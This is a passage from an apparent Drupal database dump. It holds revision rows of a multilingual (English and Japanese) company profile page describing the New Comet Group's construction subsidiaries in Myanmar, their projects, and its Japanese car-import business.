&nbsp;Nay-Pyi-Taw Staff Housing Project<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Yandanar Pone College in Mandalay<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Fire Station in Myawaddy Division<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Basic Education Middle, High Schools in various towns. (32 in total)<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Fair-priced Housing Projects<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Private Housing<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Projects in Health Industry&nbsp;<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Two storied Building (Technical School At Bo-Ka-Lay)<o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Two Storied RCC Building (MaUPin)</li></ul><blockquote><p>4. <strong>Zeya New Comet Auto Sale &amp; Services Co.,Ltd</strong><o:p></o:p></p></blockquote><p class=\"MsoListParagraphCxSpFirst\">Our Auto Trade Company was built from 1987 by buying permit of crew permit and importation and brother company New Comet Company Ltd. At 1990 established and private car, saloon car, truck car, bus car and spare-part importation from Japan. Besides Zeya New Comet Company we cooperate with other NEW ZAYYA SHWEPYI Company, AUNG NAY WIN Company, Tai Myint Aung Company made importation of private car, truck, Bus and spare-part from Japan for (25) years with the employment of 100 workers and purchase of import permit from Ministry of Commerce.&nbsp;<o:p></o:p></p><p class=\"MsoListParagraphCxSpLast\">Our ZEYA NEW COMET Auto Services Company appointed expert staff and import Japan Car for smooth operation for customer satisfaction.&nbsp;</p><hr><p class=\"MsoListParagraphCxSpLast\"><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 27, 243, 'ja', 0, '<p>&nbsp;&nbsp;&nbsp;<img data-entity-uuid=\"1153a72f-a283-46f1-a351-b0da59976c09\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-707e64535820a2e01c60182bae8fafed776a80b5294ffbbf63dd3a3bb680ab39_87337caf547d9cc_0.jpg\" width=\"100%\">&nbsp;「ニュー コメット グループ企業」は 1996 年に設立され、以下の支店で組織されています。<br>1.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット コンストラクション株式会社」<br>2.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー ゼヤー シュエ ピィーコンストラクション株式会社」<br>3.&nbsp;&nbsp;&nbsp;&nbsp;「アウン ネイ ワォンコンストラクション株式会社」<br>4.&nbsp;&nbsp;&nbsp;&nbsp;「ゼヤー ニュー コメット オートセールスとサービス株式会社」<br>5.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット トレーディング エージェンシー 株式会社」</p><blockquote><h5><br>1.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット コンストラクション株式会社」</h5></blockquote><p><br>当社の「ニュー コメット コンストラクション株式会社」は2004年に会社登録番号(295/2004-2005)で事業を開始し、ヤンゴン地方域、エーヤーワディ地方域、ザガイン地方域、マンダレー地方域 とネピドー連合領土を拠点に自動車販売と建設機械の輸入、建設業を営んでおります。<br>当社「ニュー コメット コンストラクション株式会社」の2013-2014年と2014-2015年の竣工工事の一部は以下の通りです。<br>-&nbsp;&nbsp;&nbsp;&nbsp;国籍青少年資源開発大学(ザガイン)<br>-&nbsp;&nbsp;&nbsp;&nbsp;ザガイン大学 (教育と学習のための2階建ての建物)<br>-&nbsp;&nbsp;&nbsp;&nbsp;道路交通総局と「チェタゴンティッ建設会社」の住宅プロジェクト協力<br>&nbsp; &nbsp; &nbsp;上記の活動に加えて、</p><p>-&nbsp;&nbsp;&nbsp;&nbsp;政府機関および民間の建物の修繕工事<br>-&nbsp;&nbsp;&nbsp;&nbsp;エーヤーワディ地方域で元従業員向けに手頃な価格の住宅を建設<br>-&nbsp;&nbsp;&nbsp;&nbsp;建築設計図<br>-&nbsp;&nbsp;&nbsp;&nbsp;当社は、専門コンサルタント、専門作業員、管理責任者、工事監督者、その<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;他国内外の労働者とともに、基準に沿って最新化された資機材により、<br>&nbsp; &nbsp; &nbsp;建物、道路、橋梁の建設工事を行っております。<br>-&nbsp;&nbsp;&nbsp;&nbsp;当社は理念建築、病院、学校の設計図作成、強度計算などの慈善事業を可能<br>&nbsp;&nbsp;&nbsp;&nbsp;な限り手掛けさせていただきました。</p><blockquote><h5><br>2.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー ゼヤーシュエ ピィーコンストラクション株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の「ニュー ゼヤー シュエ ピィーコンストラクション株式会社」は 2000 年 5 月 30 日に設立され、会社登録番号は(191/2001-2002)です。当社は信頼できる企業の一つであり、教育、医療、産業建築、個人住宅を提供しており、政府および民間部門の両方で多くのプロジェクトが実施されています。会社の存続期間を通じて、複雑な建設プロジェクトにおける当社の細部へのこだわりと専門知識。 当社はコスト削減ソリューションを提供する能力でクライアントから多くの賞賛を受けています。教育、医療、工業用住宅など、多くのプロジェクトを建設してきました。<br>私たちは、<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;建設前サービス<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;土建屋<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;デザインビルダー<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;建設部長を提供させていただきました。</p><blockquote><h5><br>3.&nbsp;&nbsp;&nbsp;&nbsp;「アウン ネイ ワォンコンストラクション株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の「アウン ネイ ワォンコンストラクション株式会社」は 2005年に設立され、会社登録番号は(265/2005-2006)です。同社は、民間および政府部門で住宅建築、商業建築、インテリアデザインのプロジェクトに従事しています。私たちのプロジェクトは以下の通りです。<br>-&nbsp;&nbsp;&nbsp;&nbsp;ネピドー職員住宅プロジェクト<br>-&nbsp;&nbsp;&nbsp;&nbsp;マンダレー ヤダナポン大学<br>-&nbsp;&nbsp;&nbsp;&nbsp;ミャワディ地域消防署<br>-&nbsp;&nbsp;&nbsp;&nbsp;さまざまな郡区の基礎教育中/高等学校。 (計32都市)<br>-&nbsp;&nbsp;&nbsp;&nbsp;手頃な価格の住宅プロジェクト<br>-&nbsp;&nbsp;&nbsp;&nbsp;民間住宅<br>-&nbsp;&nbsp;&nbsp;&nbsp;2階建ての建物 (ボガレ工科大学)<br>-&nbsp;&nbsp;&nbsp;&nbsp;RCC 2階建ての建物(マウビン)</p><blockquote><h5><br>4.&nbsp;&nbsp;&nbsp;&nbsp;「ゼヤー ニュー コメット オートセールスとサービス株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の自動車商社は1987年に外国人船員の名義で輸入許可証の売買を行う個人事業として設立されました。「ニュー コメット」株式会社は1990年に設立され、「ゼヤー ニュー コメット オートセールスとサービス株式会社」の子会社です。 「家庭用自動車」「各種サルーン自動車」「各種商用トラック」「観光・輸送用各種バス」「各種機械」を日本より直接仕入れ、輸入販売を開始いたしました。<br>当社「ゼヤー ニュー コメット オートセールスとサービス株式会社」には、業務を促進する資格のある従業員がいます。 お客様に十分にご満足いただけるよう、良い車を日本から直輸入しております。</p>', '', 'full_html'),
('page', 0, 27, 243, 'ko', 0, '<img data-entity-uuid=\"8ef82604-9360-40e2-94b8-357908e9ce24\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-707e64535820a2e01c60182bae8fafed776a80b5294ffbbf63dd3a3bb680ab39_87337caf547d9cc_1.jpg\" width=\"100%\"><p>Coming soon...</p>', '', 'full_html'),
('page', 0, 27, 255, 'en', 0, '<p><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:11.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\"><img data-entity-uuid=\"ab23ef9a-b19e-44cb-859b-9e243b2192c9\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-707e64535820a2e01c60182bae8fafed776a80b5294ffbbf63dd3a3bb680ab39_87337caf547d9cc.jpg\" width=\"100%\">New Comet Group of Co.,Ltd was founded in 1996 and started operation with Branches Companies as Follow:</span></p><ol><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;New Comet Construction Co.Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;New Zayya Shwe Pyi Construction Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;Aung Nay Wun Construction Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;Zeya New Comet Auto Sale &amp; Services Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;New Comet Trading Agency Co.,Ltd</span></li></ol><hr><blockquote><ol><li class=\"MsoListParagraph\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><strong>&nbsp; &nbsp; &nbsp; &nbsp;New Comet Construction Co.Ltd</strong></li></ol></blockquote><p class=\"MsoNormal\">New comet construction Co.Ltd was founded in 2004 with company Licence ( 295/ 2004-2005) and started operation construction projects , Import and sale of construction and industrial machinery and vehicles based in Yangon, Mandalay, Ayawaddy, Nay Pyi Taw, Sagaing States etc.&nbsp;<o:p></o:p></p><p class=\"MsoNormal\">Some of the construction works completed by us in the financial year (2013-2014) and (2014-2015) by our ``New Comet Construction\'\' Co.,Ltd are:&nbsp;<o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">• <span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;\">Nationalities Youth Resource Development Degree College ( Sagaing)</span><o:p></o:p></p><p class=\"MsoNormal\">• Sagaing University (two storyed classroom)<o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">• <span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;\">A joint venture housing project between Road Transport Administration Department and NEW COMET Construction Co.Ltd</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">In addition to the above projects :&nbsp;</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Departmental and private building construction and repair works</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Construction of affordable housing for ex-employees in cities in Irrawaddy Region</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Architectural design modeling</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Construction of buildings and roads and bridges continues to be carried out according to standards with veteran consultants, professional engineers, management office staff, project supervisors from the region and other regions, skilled workers and modern equipment</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Our company has been doing charity work for as long as it is capable of designing and calculating the strength of related religious buildings, hospitals and schools.</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">&nbsp;</p><blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">2. <strong>New Zayya Shwe Pyi Construction Co.,Ltd</strong><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"mso-spacerun:yes;\">&nbsp;</span>New Zayya Shwe Pyi Construction Co.,Ltd was founded in May 30<sup>th</sup>, 2001 with Company Registration Number (191/ 2001-2002). We standed as one of the trustful companies and completed projects in educational, health care, industrial buildings, private housing, high rise condominium in both public and private sectors.&nbsp;<o:p></o:p></p><p class=\"MsoNormal\">Throughout our existence, we had been praised by our clients for our attention to detail and our ability to provide knowledge driven and cost saving solutions for the complex construction projects. We built projects in areas such as Education, Health Care, Industrial Housing.<o:p></o:p></p><p class=\"MsoNormal\">Our Services are:<o:p></o:p></p><ul style=\"list-style-type:disc;\"><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Pre Construction-Service&nbsp;<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;General Contractor<o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Design Builder</li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:11.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">&nbsp; &nbsp; &nbsp; Construction Manager</span></li></ul><blockquote><p>3. <strong>Aung Nay Wun Construction Co., Ltd</strong></p></blockquote><p class=\"MsoNormal\" style=\"margin-left:.5in;\">Aung Nay Wun Construction Co.,Ltd was founded in 2005 with company registration Number (265/ 2005-2006) emphasizing in residential, commercial, construction and interior design in private and government sectors. Some of the projects we have constructed are as follow:&nbsp;<o:p></o:p></p><ul style=\"list-style-type:disc;\"><li class=\"MsoListParagraphCxSpFirst\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Nay-Pyi-Taw Staff Housing Project<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Yandanar Pone College in Mandalay<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Fire Station in Myawaddy Division<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Basic Education Middle, High Schools in various towns. (32 in total)<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Fair-priced Housing Projects<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Private Housing<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Projects in Health Industry&nbsp;<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Two storied Building (Technical School At Bo-Ka-Lay)<o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Two Storied RCC Building (MaUPin)</li></ul><blockquote><p>4. <strong>Zeya New Comet Auto Sale &amp; Services Co.,Ltd</strong><o:p></o:p></p></blockquote><p class=\"MsoListParagraphCxSpFirst\">Our Auto Trade Company was built from 1987 by buying permit of crew permit and importation and brother company New Comet Company Ltd. At 1990 established and private car, saloon car, truck car, bus car and spare-part importation from Japan. Besides Zeya New Comet Company we cooperate with other NEW ZAYYA SHWEPYI Company, AUNG NAY WIN Company, Tai Myint Aung Company made importation of private car, truck, Bus and spare-part from Japan for (25) years with the employment of 100 workers and purchase of import permit from Ministry of Commerce.&nbsp;<o:p></o:p></p><p class=\"MsoListParagraphCxSpLast\">Our ZEYA NEW COMET Auto Services Company appointed expert staff and import Japan Car for smooth operation for customer satisfaction.&nbsp;</p><hr><p class=\"MsoListParagraphCxSpLast\"><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 27, 255, 'ja', 0, '<p>&nbsp;&nbsp; <img src=\"/sites/default/files/inline-images/0-02-06-707e64535820a2e01c60182bae8fafed776a80b5294ffbbf63dd3a3bb680ab39_87337caf547d9cc_0.jpg\" data-entity-uuid=\"1153a72f-a283-46f1-a351-b0da59976c09\" data-entity-type=\"file\" width=\"100%\"> 「ニュー コメット グループ企業」は 1996 年に設立され、以下の支店で組織されています。<br>1.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット コンストラクション株式会社」<br>2.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー ゼヤー シュエ ピィーコンストラクション株式会社」<br>3.&nbsp;&nbsp;&nbsp;&nbsp;「アウン ネイ ワォンコンストラクション株式会社」<br>4.&nbsp;&nbsp;&nbsp;&nbsp;「ゼヤー ニュー コメット オートセールスとサービス株式会社」<br>5.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット トレーディング エージェンシー 株式会社」</p><blockquote><h5><br>1.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット コンストラクション株式会社」</h5></blockquote><p><br>当社の「ニュー コメット コンストラクション株式会社」は2004年に会社登録番号(295/2004-2005)で事業を開始し、ヤンゴン地方域、エーヤーワディ地方域、ザガイン地方域、マンダレー地方域 とネピドー連合領土を拠点に自動車販売と建設機械の輸入、建設業を営んでおります。<br>当社「ニュー コメット コンストラクション株式会社」の2013-2014年と2014-2015年の竣工工事の一部は以下の通りです。<br>-&nbsp;&nbsp;&nbsp;&nbsp;国籍青少年資源開発大学(ザガイン)<br>-&nbsp;&nbsp;&nbsp;&nbsp;ザガイン大学 (教育と学習のための2階建ての建物)<br>-&nbsp;&nbsp;&nbsp;&nbsp;道路交通総局と「チェタゴンティッ建設会社」の住宅プロジェクト協力<br>&nbsp; &nbsp; &nbsp;上記の活動に加えて、</p><p>-&nbsp;&nbsp;&nbsp;&nbsp;政府機関および民間の建物の修繕工事<br>-&nbsp;&nbsp;&nbsp;&nbsp;エーヤーワディ地方域で元従業員向けに手頃な価格の住宅を建設<br>-&nbsp;&nbsp;&nbsp;&nbsp;建築設計図<br>-&nbsp;&nbsp;&nbsp;&nbsp;当社は、専門コンサルタント、専門作業員、管理責任者、工事監督者、その<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;他国内外の労働者とともに、基準に沿って最新化された資機材により、<br>&nbsp; &nbsp; &nbsp;建物、道路、橋梁の建設工事を行っております。<br>-&nbsp;&nbsp;&nbsp;&nbsp;当社は理念建築、病院、学校の設計図作成、強度計算などの慈善事業を可能<br>&nbsp;&nbsp;&nbsp;&nbsp;な限り手掛けさせていただきました。</p><img data-entity-uuid=\"e508c31a-701c-4124-88ad-65e8f89a0966\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-24dbe4bb16d2a54ef691fbd31c4506732ff80a2f3712b90f57ccc8ce4dfe77f9_a0b22c95737fa277_0.jpg\"><img data-entity-uuid=\"48b01d95-2c64-40d0-b4ef-7373eae814c2\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-34e6e44107bf86b41d53ccce9f0f2bb42f7320cc464153877247fe33d75f6263_6d68ee0d1d03ab44_0.jpg\"><blockquote><h5><br>2.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー ゼヤーシュエ ピィーコンストラクション株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の「ニュー ゼヤー シュエ ピィーコンストラクション株式会社」は 2000 年 5 月 30 日に設立され、会社登録番号は(191/2001-2002)です。当社は信頼できる企業の一つであり、教育、医療、産業建築、個人住宅を提供しており、政府および民間部門の両方で多くのプロジェクトが実施されています。会社の存続期間を通じて、複雑な建設プロジェクトにおける当社の細部へのこだわりと専門知識。 当社はコスト削減ソリューションを提供する能力でクライアントから多くの賞賛を受けています。教育、医療、工業用住宅など、多くのプロジェクトを建設してきました。<br>私たちは、<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;建設前サービス<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;土建屋<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;デザインビルダー<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;建設部長を提供させていただきました。</p><img data-entity-uuid=\"58de38f3-2574-4b5c-843d-3230f047d610\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-d8522b37b78efc78db7acdeb6859eb6dac6f17114ea9d9e8132582658b69e57d_828dd20036b8de29_0.jpg\"><blockquote><h5><br>3.&nbsp;&nbsp;&nbsp;&nbsp;「アウン ネイ ワォンコンストラクション株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の「アウン ネイ ワォンコンストラクション株式会社」は 2005年に設立され、会社登録番号は(265/2005-2006)です。同社は、民間および政府部門で住宅建築、商業建築、インテリアデザインのプロジェクトに従事しています。私たちのプロジェクトは以下の通りです。<br>-&nbsp;&nbsp;&nbsp;&nbsp;ネピドー職員住宅プロジェクト<br>-&nbsp;&nbsp;&nbsp;&nbsp;マンダレー ヤダナポン大学<br>-&nbsp;&nbsp;&nbsp;&nbsp;ミャワディ地域消防署<br>-&nbsp;&nbsp;&nbsp;&nbsp;さまざまな郡区の基礎教育中/高等学校。 (計32都市)<br>-&nbsp;&nbsp;&nbsp;&nbsp;手頃な価格の住宅プロジェクト<br>-&nbsp;&nbsp;&nbsp;&nbsp;民間住宅<br>-&nbsp;&nbsp;&nbsp;&nbsp;2階建ての建物 (ボガレ工科大学)<br>-&nbsp;&nbsp;&nbsp;&nbsp;RCC 2階建ての建物(マウビン)</p><img data-entity-uuid=\"fd9b3a24-223c-42c0-a54c-99865457abc5\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-e82a8d4b88a3246f463cbabfb97d7c5e1e6062591670b60167a39b47ddfa620d_ef0c059dbd11ee9a_0.jpg\"><blockquote><h5><br>4.&nbsp;&nbsp;&nbsp;&nbsp;「ゼヤー ニュー コメット オートセールスとサービス株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の自動車商社は1987年に外国人船員の名義で輸入許可証の売買を行う個人事業として設立されました。「ニュー コメット」株式会社は1990年に設立され、「ゼヤー ニュー コメット オートセールスとサービス株式会社」の子会社です。 「家庭用自動車」「各種サルーン自動車」「各種商用トラック」「観光・輸送用各種バス」「各種機械」を日本より直接仕入れ、輸入販売を開始いたしました。<br>当社「ゼヤー ニュー コメット オートセールスとサービス株式会社」には、業務を促進する資格のある従業員がいます。 お客様に十分にご満足いただけるよう、良い車を日本から直輸入しております。</p><img data-entity-uuid=\"ce131080-c99f-4c7c-8480-d2f179b93d87\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-18c51a8d67a390f18922d18beb910acd2a525cc797c8808eda202c393b52cf73_c5db29096f9c0740_0.jpg\"><img data-entity-uuid=\"ca35e4dc-753b-43ed-8048-698e92a9994d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-349a229a5607a0188a33a1c37d44950447b7e0f162a2fa88997b1fe702c7a628_22a1876ac9fe1a52_0.jpg\"><img data-entity-uuid=\"52c6749b-5faf-49ba-b3d8-8e53128b3263\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-25fbfa2a530d20c01a2685b859a828df0faf3a9d75afd0639a5b72797d560221_8ddad4e328e0428a_0.jpg\">', '', 'full_html'),
('page', 0, 27, 255, 'ko', 0, '<img data-entity-uuid=\"8ef82604-9360-40e2-94b8-357908e9ce24\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-707e64535820a2e01c60182bae8fafed776a80b5294ffbbf63dd3a3bb680ab39_87337caf547d9cc_1.jpg\" width=\"100%\"><p>Coming soon...</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 27, 256, 'en', 0, '<p><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:11.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\"><img src=\"/sites/default/files/inline-images/0-02-06-707e64535820a2e01c60182bae8fafed776a80b5294ffbbf63dd3a3bb680ab39_87337caf547d9cc.jpg\" data-entity-uuid=\"ab23ef9a-b19e-44cb-859b-9e243b2192c9\" data-entity-type=\"file\" width=\"100%\">New Comet Group of Co.,Ltd was founded in 1996 and started operation with Branches Companies as Follow:</span></p><ol><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;New Comet Construction Co.Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;New Zayya Shwe Pyi Construction Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;Aung Nay Wun Construction Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;Zeya New Comet Auto Sale &amp; Services Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span 